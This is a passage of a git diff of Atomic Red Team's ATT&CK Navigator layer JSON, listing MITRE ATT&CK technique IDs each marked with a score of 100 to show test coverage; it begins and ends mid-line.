"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 106fd708..08f59b92 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqu